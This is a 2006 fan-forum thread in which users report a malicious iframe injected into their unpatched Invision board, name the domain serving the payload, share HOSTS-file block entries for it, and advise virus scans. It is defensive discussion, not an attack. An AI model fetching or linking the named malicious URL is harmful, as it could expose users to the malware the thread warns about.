Define Cynical Fan Forums

On the O&M mailing list, The J.A.M discovered a spyware/virus infection in the code for the forum. Before doing anything on this site, please read my reply to him, and do NOT visit any URLs in this message:<br><br><br>When I accessed the actual board, I got a blocked cookie request from toolbardollars.biz, it seems than an infected file has embedded itself in the forum.<br><br>Upon viewing the source code, it seems that there's an Iframe embedded in the source code for the forum that loads <a href='http://definecynical.mancubus.net/forum ... topic=2724' target='_blank'>http://toolbardollars.biz/dl/adv553.php</a>.<br><br>To view the site safely, add the following lines to your HOSTS file (on WinXP, it's in C:\WINDOWS\System32\drivers\etc):<br><br>127.0.0.1 toolbardollars.biz<br>127.0.0.1 www.toolbardollars.biz<br><br>This will prevent any access to the malicious site, and allow safe browsing until the forum is repaired. If you do not have antivirus software installed, and you've visited the Define Cynical board, please do a full system scan before viewing any sensitive data on your computer.<br><br>EDIT: This is not an isolated incident, as reported by <a href='http://syndicated.livejournal.com/f_secure/186317.html' target='_blank'>F-Secure</a>.<br><span style='color:#64008D'>Mod Edit: changed destination of link in case foolish readers click the link anyway.</span>

<!--QuoteBegin-FelixSoftpaw+Jan 31 2006, 11:41 AM--> <table border='0' align='center' width='95%' ><tr><td class='quotetop'><b>Quote:</b> (FelixSoftpaw @ Jan 31 2006, 11:41 AM)</td></tr><tr><td class='quotebody'> To view the site safely, add the following lines to your HOSTS file (on WinXP, it's in C:\WINDOWS\System32\drivers\etc):<br><br>127.0.0.1 toolbardollars.biz<br>127.0.0.1 www.toolbardollars.biz <!--QuoteEnd--> </td></tr></table> <!--QuoteEEnd--><br> I just did so. This seems like serious business, and I hope it gets straightened out soon. Spammers are quite a bother.

0.0.0.0 can be even safer than 127.0.0.1, because 0.0.0.0 refuses every connection, every time (localhost only does so until you install a web server)

<!--QuoteBegin-Richard K Niner+Jan 31 2006, 02:22 PM--> <table border='0' align='center' width='95%' ><tr><td class='quotetop'><b>Quote:</b> (Richard K Niner @ Jan 31 2006, 02:22 PM)</td></tr><tr><td class='quotebody'> 0.0.0.0 can be even safer than 127.0.0.1, because 0.0.0.0 refuses every connection, every time (localhost only does so until you install a web server) <!--QuoteEnd--> </td></tr></table> <!--QuoteEEnd--><br> I did those as well, just to be safe.

I would guess that <a href='http://forums.invisionpower.com/index.p ... pic=204627' target='_blank'>this</a> has something to do with it.

Yes, patching would definitely help, though that doesn't seem to be a priority for the admins here (we've been hacked how many times, and still haven't patched the holes?).

<!--QuoteBegin-FelixSoftpaw+Jan 31 2006, 02:56 PM--> <table border='0' align='center' width='95%' ><tr><td class='quotetop'><b>Quote:</b> (FelixSoftpaw @ Jan 31 2006, 02:56 PM)</td></tr><tr><td class='quotebody'> Yes, patching would definitely help, though that doesn't seem to be a priority for the admins here (we've been hacked how many times, and still haven't patched the holes?). <!--QuoteEnd--> </td></tr></table> <!--QuoteEEnd--><br> Is updating the board hard to do?

Nope, unless the code has been modified, and that doesn't appear to be the case.

<!--emo&--><img src='http://definecynical.mancubus.net/forum ... ns/mad.gif' border='0' style='vertical-align:middle' alt='mad.gif' /><!--endemo--> <br><br>Screw virus-writers. Screw 'em in their asocial lil' ears.<br><br> <!--emo&--><img src='http://definecynical.mancubus.net/forum ... ns/mad.gif' border='0' style='vertical-align:middle' alt='mad.gif' /><!--endemo--> <br><br>Anyway, was about to make a post on this, good to see you're already aware. My AV caught it and I deleted it. Going to run a full-scan, though.<br><br>Question - If my AV caught the trojan, should I make any other modifications, or is it not worth it?

I thought the main reason the board hasn't been updated in ages is that IPB has since become a pay-per-license based board system, starting at around version 2.0 (I think). And if memory serves, the board can't be updated to anything above v.2 unless 5h or likeafox has a subscription with IPB. Which, unless somebody here gets $70 for a one-year license or $185 for an endless license, probably isn't going to happen soon.<br><br>Granted, I could be wrong. Wouldn't be anywhere near the first time.

Yay for spyware. <!--emo&<_<--><img src='http://definecynical.mancubus.net/forum ... ns/dry.gif' border='0' style='vertical-align:middle' alt='dry.gif' /><!--endemo--> <br><br>HOSTS file modified, so all is good for me.<br>

<!--QuoteBegin-Ankaris+Jan 31 2006, 07:02 PM--> <table border='0' align='center' width='95%' ><tr><td class='quotetop'><b>Quote:</b> (Ankaris @ Jan 31 2006, 07:02 PM)</td></tr><tr><td class='quotebody'> Question - If my AV caught the trojan, should I make any other modifications, or is it not worth it? <!--QuoteEnd--></td></tr></table> <!--QuoteEEnd--><br>I'd highly recommend HOSTS-blocking the domain, since no good can come from it, and it'll prevent future attempted downloads. Aside from that, make sure you delete your cache, you should be fine. My antivirus caught it, and I did an extensive check, with no infection (and I'm not even running XP SP2).<br><br><!--QuoteBegin-GhostWay+--> <table border='0' align='center' width='95%' ><tr><td class='quotetop'><b>Quote:</b> (GhostWay)</td></tr><tr><td class='quotebody'> I thought the main reason the board hasn't been updated in ages is that IPB has since become a pay-per-license based board system, starting at around version 2.0 (I think). And if memory serves, the board can't be updated to anything above v.2 unless 5h or likeafox has a subscription with IPB. Which, unless somebody here gets $70 for a one-year license or $185 for an endless license, probably isn't going to happen soon.<!--QuoteEnd--></td></tr></table> <!--QuoteEEnd--><br><br>I did some checking, and you're right, there isn't even an option to download the free version anymore. In which case, we should really switch to something else, because these attacks aren't going to stop simply by ignoring them. Migrating to another board isn't difficult, provided that it's something that's still being supported.

I reset the board so, for the time being, there should be no problems. This attack is certainly something I will look into.<br><br>Felix pray tell what browser do you use?